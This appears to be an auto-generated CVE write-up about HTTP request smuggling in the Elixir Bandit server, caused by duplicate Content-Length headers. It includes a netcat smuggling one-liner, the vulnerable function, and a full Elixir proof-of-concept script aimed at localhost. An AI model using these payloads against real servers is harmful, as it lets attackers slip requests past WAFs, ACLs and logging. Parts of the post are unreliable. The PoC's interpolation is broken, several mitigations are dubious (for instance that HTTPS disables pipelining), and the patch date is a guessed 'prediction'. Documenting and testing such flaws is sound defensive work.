Listen to this Post
How the mentioned CVE works (around 20 lines):
Bandit’s `Bandit.Headers.get_content_length/1` calls List.keyfind/3, returning only the first `Content-Length` header value when multiple lines exist. RFC 9112 §6.3 item 5 mandates that duplicate `Content-Length` headers be treated as an unrecoverable framing error, requiring a 400 response. Bandit silently accepts two `Content-Length` headers with differing values, using the first value for body length. The remaining header line is ignored, but its value is not validated. The body bytes (as defined by the second header) are not consumed as part of the first request. Instead, after processing the first request (with zero body length), Bandit reads the leftover data from the TCP buffer as a separate pipelined request. A malicious client sends `Content-Length: 0` followed by `Content-Length: 43` and a 43-byte payload containing a smuggled `GET /smuggled HTTP/1.1` line. Bandit replies to the first POST, then treats the smuggled line as a second request on the same keep-alive connection. This bypasses any frontend proxy that uses the last `Content-Length` value (CL-last behavior) and forwards both headers. The proxy applies its security controls (WAF, ACLs, rate limiting) to the first request only; the smuggled request never traverses those controls. The vulnerability was introduced before v0.1.0 (Nov 5, 2020) via commit e5270b1 on Nov 16, 2019. The fix requires collecting all `Content-Length` values, parsing them, and rejecting the request unless all values are byte-identical. Bandit already rejects the comma-separated form (Content-Length: 0, 43) correctly; the bug applies only to multi-line duplicate headers.
dailycve form:
Platform: Elixir Bandit
Version: 1.10.4 / earlier
Vulnerability: CL.CL smuggling
Severity: Medium
date: 2026-04-28
Prediction: Patch expected May 15 2026
Analytics under What Undercode Say:
Test with netcat (raw HTTP) printf "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\nContent-Length: 43\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | nc 127.0.0.1 4321
Vulnerable function location
lib/bandit/headers.ex
def get_content_length(headers) do
case List.keyfind(headers, "content-length", 0) do
{_, value} -> parse_content_length(value)
nil -> nil
end
end
How Exploit:
Full PoC script (save as smuggle.exs)
Mix.install([{:bandit, "~> 1.10"}, {:plug, "~> 1.19"}])
defmodule DemoApp do
@behaviour Plug
def init(opts), do: opts
def call(conn, _opts) do
Plug.Conn.send_resp(conn, 200, "method={conn.method} path={conn.request_path}\n")
end
end
defmodule Smuggle do
@port 4321
def run do
{:ok, _} = Bandit.start_link(plug: DemoApp, ip: {127,0,0,1}, port: @port)
req = "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\nContent-Length: 43\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
{:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])
:ok = :gen_tcp.send(sock, req)
response = :gen_tcp.recv(sock, 0, 2000) |> then(fn {:ok, d} -> d end)
IO.puts(response)
end
end
Smuggle.run()
Protection from this CVE:
- Upgrade Bandit to patched version (when available).
- Configure frontend proxy to reject duplicate `Content-Length` headers (e.g., `proxy_set_header Content-Length “”` in nginx, or enable strict parsing).
- Deploy Bandit directly on internet without permissive frontends.
- Use HTTP/2 or HTTPS to mitigate request smuggling (pipelining disabled).
Impact:
Spec violation enabling request smuggling when Bandit sits behind a CL-last proxy. Attacker can bypass edge WAF, path-based ACLs, rate limiting, and audit logging. Does not bypass application authentication (Plug pipeline still runs). Realistic data exfiltration through response-queue desync on pooled upstream connections. Major CDNs (Cloudflare, AWS ALB, modern nginx, HAProxy default) reject CL.CL and are not vulnerable; custom/legacy proxies are at risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
